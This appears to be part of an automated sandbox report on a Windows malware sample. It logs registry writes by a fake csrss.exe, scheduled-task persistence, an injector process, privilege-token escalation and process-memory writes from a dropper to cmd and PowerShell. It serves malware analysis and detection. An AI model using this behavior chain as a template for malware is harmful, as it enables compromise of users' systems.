Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Windows\rss\csrss.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10d7483856.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Gparted\Build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 640 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 640 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 640 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4708 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe
PID 4708 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe
PID 4708 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe
PID 4100 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1248 wrote to memory of 932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1248 wrote to memory of 932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1248 wrote to memory of 932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 4996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 4996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 4996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4100 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
